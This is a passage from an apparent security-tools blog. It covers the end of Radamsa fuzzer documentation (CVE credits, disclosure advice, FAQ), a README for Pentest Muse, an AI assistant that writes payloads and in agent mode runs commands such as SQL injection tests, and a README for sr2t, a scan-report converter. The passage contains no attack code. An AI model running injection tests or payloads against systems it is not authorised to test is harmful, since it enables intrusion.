<tr> <td>CVE-2011-0181</td> <td>Apple ImageIO</td> <td>found by Harry Sintonen</td> </tr>
<tr> <td>CVE-2011-0198</td> <td>Apple Type Services</td> <td>found by Harry Sintonen</td> </tr>
<tr> <td>CVE-2011-0205</td> <td>Apple ImageIO</td> <td>found by Harry Sintonen</td> </tr>
<tr> <td>CVE-2011-0201</td> <td>Apple CoreFoundation</td> <td>found by Harry Sintonen</td> </tr>
<tr> <td>CVE-2011-1276</td> <td>Excel</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2011-1186</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-1434</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-2348</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-2804</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-2830</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-2839</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-2861</td> <td>Chrome/pdf</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3146</td> <td>librsvg</td> <td>found by Sauli Pahlman</td> </tr>
<tr> <td>CVE-2011-3654</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3892</td> <td>Theora</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3893</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3895</td> <td>FFmpeg</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3957</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3959</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3960</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3962</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3966</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2011-3970</td> <td>libxslt</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2012-0449</td> <td>Firefox</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-0469</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2012-0470</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2012-0457</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2012-2825</td> <td>libxslt</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-2849</td> <td>Chrome/GIF</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2012-3972</td> <td>Mozilla Firefox</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-1525</td> <td>Acrobat Reader</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-2871</td> <td>libxslt</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-2870</td> <td>libxslt</td> <td>found by Nicolas Grégoire of Agarri</td> </tr>
<tr> <td>CVE-2012-4922</td> <td>tor</td> <td>found by the Tor project</td> </tr>
<tr> <td>CVE-2012-5108</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-2887</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-5120</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-5121</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-5145</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-4186</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-4187</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-4188</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2012-4202</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2013-0744</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr>
<tr> <td>CVE-2013-1691</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2013-1708</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2013-4082</td> <td>Wireshark</td> <td>found by cons0ul</td> </tr>
<tr> <td>CVE-2013-1732</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2014-0526</td> <td>Adobe Reader X/XI</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr>
<tr> <td>CVE-2014-3669</td> <td>PHP</td> <td></td> </tr>
<tr> <td>CVE-2014-3668</td> <td>PHP</td> <td></td> </tr>
<tr> <td>CVE-2014-8449</td> <td>Adobe Reader X/XI</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr>
<tr> <td>CVE-2014-3707</td> <td>cURL</td> <td>Symeon Paraschoudis</td> </tr>
<tr> <td>CVE-2014-7933</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2015-0797</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2015-0813</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2015-1220</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2015-1224</td> <td>Chrome</td> <td>OUSPG</td> </tr>
<tr> <td>CVE-2015-2819</td> <td>Sybase SQL</td> <td>vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2015-2820</td> <td>SAP Afaria</td> <td>vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2015-7091</td> <td>Apple QuickTime</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr>
<tr> <td>CVE-2015-8330</td> <td>SAP PCo agent</td> <td>Mathieu Geli (ERPScan)</td> </tr>
<tr> <td>CVE-2016-1928</td> <td>SAP HANA hdbxsengine</td> <td>Mathieu Geli (ERPScan)</td> </tr>
<tr> <td>CVE-2016-3979</td> <td>SAP NetWeaver</td> <td>@ret5et (ERPScan)</td> </tr>
<tr> <td>CVE-2016-3980</td> <td>SAP NetWeaver</td> <td>@ret5et (ERPScan)</td> </tr>
<tr> <td>CVE-2016-4015</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2016-9562</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2017-5371</td> <td>SAP ASE OData</td> <td>@vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2017-9843</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr>
<tr> <td>CVE-2017-9845</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr>
<tr> <td><a href="https://www.nccgroup.trust/globalassets/newsroom/uk/events/offensivecon2018-the-return-of-robin-hood-vs-cisco-asa.pdf" rel="nofollow" target="_blank" title="CVE-2018-0101">CVE-2018-0101</a></td> <td>Cisco ASA WebVPN/AnyConnect</td> 
<td>@saidelike (NCC Group)</td> </tr> </tbody> </table>
<p>We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting onward many of the above-mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.</p>
<h2>Thanks</h2>
<p>The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.</p>
<ul> <li>Darkkey</li> <li>Branden Archer</li> </ul>
<h2>Troubleshooting</h2>
<p>Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.</p>
<p>You can also drop by at #radamsa on Freenode if you have questions or feedback.</p>
<p>Issues in your own programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day), chances are that others will too.</p>
<p>Issues in programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. If you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.</p>
<h1>FAQ</h1>
<p>Q: If I find a bug with radamsa, do I have to mention the tool?<br /> A: No.</p>
<p>Q: Will you make a graphical version of radamsa?<br /> A: No. The intention is to keep it simple and scriptable for use in <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> regression tests and continuous testing.</p>
<p>Q: I can't install! 
I don't have root access on the machine!<br /> A: You can omit the <code>$ make install</code> part and just run radamsa from <code>bin/radamsa</code> in the build directory, or copy it somewhere else and use it from there.</p>
<p>Q: Radamsa takes several GB of memory to compile!1<br /> A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions on this page.</p>
<p>Q: Radamsa does not compile using the instructions on this page!<br /> A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or ask on IRC (#radamsa on freenode).</p>
<p>Q: I used fuzzer X and found many more bugs in program Y than Radamsa did.<br /> A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish into radamsa if it's general purpose enough. It'd also be useful to get the samples you used to check how well radamsa does, because it might be overfitting some heuristic.</p>
<p>Q: Can I get support for using radamsa?<br /> A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.</p>
<p>Q: Can I use radamsa on Windows?<br /> A: An experimental Windows executable is now in Downloads, but we usually have not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.</p>
<p>Q: How can I install radamsa?<br /> A: Grab a binary from downloads and run it, or <code>$ make && sudo make install</code>.</p>
<p>Q: How can I uninstall radamsa?<br /> A: Remove the binary you grabbed from downloads, or <code>$ sudo make uninstall</code>.</p>
<p>Q: Why are many outputs generated by Radamsa equal?<br /> A: Radamsa doesn't keep track of which outputs it has already generated, but instead relies on varying mutations to keep the output varied enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. 
If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.</p>
<p>Q: There are lots of command line options. Which should I use for best results?<br /> A: The recommended use is <code>$ radamsa -o output-%n.foo -n 100 samples/*.foo</code>, which is also what is used internally at OUSPG. It's usually best and most future-proof to let radamsa decide the details.</p>
<p>Q: How can I make radamsa faster?<br /> A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. <code>-m bf,bd,bi,br,bp,bei,bed,ber,sr,sd</code>, you will get about 10x faster output.</p>
<p>Q: What's with the funny name?<br /> A: It's from a scene in a Finnish children's story. You've probably never heard of it.</p>
<p>Q: Is this the last question?<br /> A: Yes.</p>
<h2>Warnings</h2>
<p>Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can cause arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> scanner trying to do something to fuzzed data before it is intentionally tested. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. 
When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.</p>
<p>Not safe when used as prescribed.</p>
<p>This product may contain faint traces of parenthesis.</p>
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/akihe/radamsa" rel="nofollow" target="_blank" title="Download Radamsa">Download Radamsa</a></span></b></div>
<h1>Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals</h1>
<p>Published 2024-03-24.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp36JaXhc6meMUOFoN5ZY_1zibRIuxSjW0QIMWgVBVzHkfquKJ7AQY5aopGUYqZj1YcBpKT75LB3OyNm50BhNz-MSCc9K6CQbMtJWfWzT11rYLlk2ZZPVuy2CMHh4ggFv6bqGE5C8MJ3DSdWCEV3e7OBN_vx_tRiB8ppekFagCQozPBfVetZxFoLxO6rYA/s1242/Pentest%20Muse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="1242" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp36JaXhc6meMUOFoN5ZY_1zibRIuxSjW0QIMWgVBVzHkfquKJ7AQY5aopGUYqZj1YcBpKT75LB3OyNm50BhNz-MSCc9K6CQbMtJWfWzT11rYLlk2ZZPVuy2CMHh4ggFv6bqGE5C8MJ3DSdWCEV3e7OBN_vx_tRiB8ppekFagCQozPBfVetZxFoLxO6rYA/w640-h220/Pentest%20Muse.png" width="640" /></a></div>
<p>Pentest Muse is an AI assistant tailored for <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> commands, and iteratively solve complex tasks. 
</p>
<h2>Pentest Muse Web App</h2>
<p>In addition to this command-line tool, we are excited to introduce the <a href="https://www.pentestmuse.ai" rel="nofollow" target="_blank" title="Pentest Muse Web Application">Pentest Muse Web Application</a>! The web app has access to the latest online information and would be a good AI assistant for your <a href="https://www.kitploit.com/search/label/Pentesting" target="_blank" title="pentesting">pentesting</a> job.</p>
<h2>Disclaimer</h2>
<p>This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.</p>
<h2>Requirements</h2>
<ul> <li>Python 3.12 or later</li> <li>Necessary Python packages as listed in <code>requirements.txt</code></li> </ul>
<h2>Setup</h2>
<h3>Standard Setup</h3>
<ol>
<li>Clone the repository: <pre><code>git clone https://github.com/pentestmuse-ai/PentestMuse<br />cd PentestMuse<br /></code></pre></li>
<li>Install the required packages: <pre><code>pip install -r requirements.txt<br /></code></pre></li>
</ol>
<h3>Alternative Setup (Package Installation)</h3>
<p>Install Pentest Muse as a Python package:</p>
<p><code>pip install .</code></p>
<h2>Running the Application</h2>
<h3>Chat Mode (Default)</h3>
<p>In chat mode, you can chat with Pentest Muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:</p>
<pre><code>python run_app.py<br /></code></pre>
<p>or</p>
<pre><code>pmuse<br /></code></pre>
<h3>Agent Mode (Experimental)</h3>
<p>You can also give Pentest Muse more control by asking it to take actions for you in agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> test on url xxx'). 
To start the program in agent mode, use:</p>
<pre><code>python run_app.py agent<br /></code></pre>
<p>or</p>
<pre><code>pmuse agent<br /></code></pre>
<h2>Selection of Language Models</h2>
<h3>Managed APIs</h3>
<p>You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, simply start the Pentest Muse CLI and the program will prompt you to log in.</p>
<h3>OpenAI API keys</h3>
<p>Alternatively, you can use your own OpenAI API key. To do this, add the argument <code>--openai-api-key=[your <a href="https://www.kitploit.com/search/label/Openai%20Api" target="_blank" title="openai api">openai api</a> key]</code> when starting the program.</p>
<h2>Contact</h2>
<p>For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or <a href="https://discord.gg/5cY35u99Nr" rel="nofollow" target="_blank" title="join our discord">join our discord</a>. 
Your input is invaluable in helping us improve and evolve.</p>
<div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/AbstractEngine/pentest-muse-cli" rel="nofollow" target="_blank" title="Download Pentest-Muse-Cli">Download Pentest-Muse-Cli</a></span></b></div>
<h1>Sr2T - Converts Scanning Reports To A Tabular Format</h1>
<p>Published 2024-03-23.</p>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941231914934178" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y=w640-h334" width="640" /></a></p>
<h1>Scanning reports to tabular (sr2t)</h1>
<p>This tool takes a <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> tool's output file and converts it to a tabular format (CSV, XLSX, or text table). It can process output from the following tools:</p>
<ol> <li>Nmap (XML);</li> <li>Nessus (XML);</li> <li>Nikto (XML);</li> <li>Dirble (XML);</li> <li>Testssl (JSON);</li> <li>Fortify (FPR).</li> </ol>
<h2>Rationale</h2>
<p>This tool offers a human-readable, tabular format that you can tie to the observations you have drafted in your report. Why? 
Because then your reviewers can tell that you, the pentester, investigated all open ports that were found and looked at all <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> reports.</p>
<h2>Dependencies</h2>
<ol> <li>argparse (dev-python/argparse);</li> <li>prettytable (dev-python/prettytable);</li> <li>python (dev-lang/python);</li> <li>xlsxwriter (dev-python/xlsxwriter).</li> </ol>
<h2>Install</h2>
<p>Using Pip:</p>
<p><code>pip install --user sr2t</code></p>
<h2>Usage</h2>
<p>You can use <code>sr2t</code> in two ways:</p>
<ul> <li>When installed as a package, call the installed script: <code>sr2t --help</code>.</li> <li>When Git cloned, call the package directly from the root of the Git repository: <code>python -m src.sr2t --help</code></li> </ul>
<pre><code>$ sr2t --help<br />usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]<br /> [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]<br /> [--testssl TESTSSL [TESTSSL ...]]<br /> [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]<br /> [--nmap-services] [--no-nessus-autoclassify]<br /> [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]<br /> [--nessus-tls-file NESSUS_TLS_FILE]<br /> [--nessus-x509-file NESSUS_X509_FILE]<br /> [--nessus-http-file NESSUS_HTTP_FILE]<br /> [--nessus-smb-file NESSUS_SMB_FILE]<br /> [--nessus-rdp-file NESSUS_RDP_FILE]<br /> [--nessus-ssh-file NESSUS_SSH_FILE]<br /> [--nessus-min-severity NESSUS_MIN_SEVERITY]<br /> [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]<br /> [--nessus-sort-by NESSUS_SORT_BY]<br /> [--nikto-description-width NIKTO_DESCRIPTION_WIDTH]<br /> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]<br /> [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]<br /> [-oA OUTPUT_ALL]<br /><br />Converting scanning reports to a tabular format<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --nmap-state NMAP_STATE<br /> Specify the desired state 
to filter (e.g.<br /> open|filtered).<br /> --nmap-services Specify to ouput a supplemental list of detected<br /> services.<br /> --no-nessus-autoclassify<br /> Specify to not autoclassify Nessus results.<br /> --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE<br /> Specify to override a custom Nessus autoclassify YAML<br /> file.<br /> --nessus-tls-file NESSUS_TLS_FILE<br /> Specify to override a custom Nessus TLS findings YAML<br /> file.<br /> --nessus-x509-file NESSUS_X509_FILE<br /> Specify to override a custom Nessus X.509 findings<br /> YAML file.<br /> --nessus-http-file NESSUS_HTTP_FILE<br /> Specify to override a custom Nessus HTTP findings YAML<br /> file.<br /> --nessus-smb-file NESSUS_SMB_FILE<br /> Specify to override a custom Nessus SMB findings YAML<br /> file.<br /> --nessus-rdp-file NESSUS_RDP_FILE<br /> Specify to override a custom Nessus RDP findings YAML<br /> file.<br /> --nessus-ssh-file NESSUS_SSH_FILE<br /> Specify to override a custom Nessus SSH findings YAML<br /> file.<br /> --nessus-min-severity NESSUS_MIN_SEVERITY<br /> Specify the minimum severity to output (e.g. 1).<br /> --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH<br /> Specify the width of the pluginid column (e.g. 30).<br /> --nessus-sort-by NESSUS_SORT_BY<br /> Specify to sort output by ip-address, port, plugin-id,<br /> plugin-name or severity.<br /> --nikto-description-width NIKTO_DESCRIPTION_WIDTH<br /> Specify the width of the description column (e.g. 30).<br /> --fortify-details Specify to include the Fortify abstracts, explanations<br /> and recommendations for each vulnerability.<br /> --annotation-width ANNOTATION_WIDTH<br /> Specify the width of the annotation column (e.g. 30).<br /> -oC OUTPUT_CSV, --output-csv OUTPUT_CSV<br /> Specify the output CSV basename (e.g. output).<br /> -oT OUTPUT_TXT, --output-txt OUTPUT_TXT<br /> Specify the output TXT file (e.g. 
output.txt).<br /> -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX<br /> Specify the output XLSX file (e.g. output.xlsx). Only<br /> for Nessus at the moment<br /> -oA OUTPUT_ALL, --output-all OUTPUT_ALL<br /> Specify the output basename to output to all formats<br /> (e.g. output).<br /><br />specify at least one:<br /> --nessus NESSUS [NESSUS ...]<br /> Specify (multiple) Nessus XML files.<br /> --nmap NMAP [NMAP ...]<br /> Specify (multiple) Nmap XML files.<br /> --nikto NIKTO [NIKTO ...]<br /> Specify (multiple) Nikto XML files.<br /> --dirble DIRBLE [DIRBLE ...]<br /> Specify (multiple) Dirble XML files.<br /> --testssl TESTSSL [TESTSSL ...]<br /> Specify (multiple) Testssl JSON files.<br /> --fortify FORTIFY [FORTIFY ...]<br /> Specify (multiple) HP Fortify FPR files.<br /></code></pre>
<h2>Example</h2>
<p>A few examples:</p>
<h3>Nessus</h3>
<p>To produce an XLSX file:</p>
<pre><code>$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx<br /></code></pre>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhrlelPl4pgyuW1SE8vlIz1jBSPwmZ-vEZZaV5jq0TujHxbUnFFKHrv5Muojly0Z2uM-L1YQbFPqETqQ2lraiY3aKUwtX7x9SXynnVDvNwxcIK6Y1oRKAm3qRfZLLXtu3Glw6B0h_xcvOlMNLLxQU5uEjknxSGauSG8XPJ-3Q2g0sjnoQzqp9oC1AXZljA"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941225013694178" src="https://blogger.googleusercontent.com/img/a/AVvXsEhrlelPl4pgyuW1SE8vlIz1jBSPwmZ-vEZZaV5jq0TujHxbUnFFKHrv5Muojly0Z2uM-L1YQbFPqETqQ2lraiY3aKUwtX7x9SXynnVDvNwxcIK6Y1oRKAm3qRfZLLXtu3Glw6B0h_xcvOlMNLLxQU5uEjknxSGauSG8XPJ-3Q2g0sjnoQzqp9oC1AXZljA=w640-h334" width="640" /></a></p>
<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjm4-KU4OE2Y9RYOmtuglNsjfSaDbfJSyZX2LayFFEX_TqyIvmmMdAyzZnfFfIux1n7UpH8-V-Cwk15pIf4B5gsqBCXCpFJqh6kTMLG4YEKklodmaJ2GQv_99hIz6pFw5kpi34g0YC6nYMrmwZfoO3t2xL8dSiPeCBhS0VpfuKjOpB_0B6kYt_BPB1Ef-s"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941230643252066" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEjm4-KU4OE2Y9RYOmtuglNsjfSaDbfJSyZX2LayFFEX_TqyIvmmMdAyzZnfFfIux1n7UpH8-V-Cwk15pIf4B5gsqBCXCpFJqh6kTMLG4YEKklodmaJ2GQv_99hIz6pFw5kpi34g0YC6nYMrmwZfoO3t2xL8dSiPeCBhS0VpfuKjOpB_0B6kYt_BPB1Ef-s=w640-h334" width="640" /></a></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941231914934178" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y=w640-h334" width="640" /></a></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh3x1ZM6oSyklHC9rMSINEtsPDBFiU2Jjx_2JAl9lwh1MjpH_J2UalYEUGMEwokgdzV1z-I5nd3sArPejR9l-DBHc7Eo1riT6jrfeOvIs_L_54LFQOahjvcxANUJVV3Q6ddzJBUo5BEF8TklioWQoxjzG4yES1rJGF69_adze94BuCKwhmzV-F2wsBdxtw"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941232623535618" src="https://blogger.googleusercontent.com/img/a/AVvXsEh3x1ZM6oSyklHC9rMSINEtsPDBFiU2Jjx_2JAl9lwh1MjpH_J2UalYEUGMEwokgdzV1z-I5nd3sArPejR9l-DBHc7Eo1riT6jrfeOvIs_L_54LFQOahjvcxANUJVV3Q6ddzJBUo5BEF8TklioWQoxjzG4yES1rJGF69_adze94BuCKwhmzV-F2wsBdxtw=w640-h334" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --nessus example/nessus.nessus<br />+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br />| host | port | plugin id | plugin name | severity | annotations |<br 
/>+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br />| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |<br />| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |<br />| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |<br />| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |<br />| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |<br />| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |<br />| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |<br />| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |<br />| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |<br />| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |<br />| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |<br />| 192.168.142.2 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.2 | 443 | 45411 | 
SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |<br />| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |<br />| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |<br />| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |<br />+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br /></code></pre>
<p>Or to output a CSV file:</p>
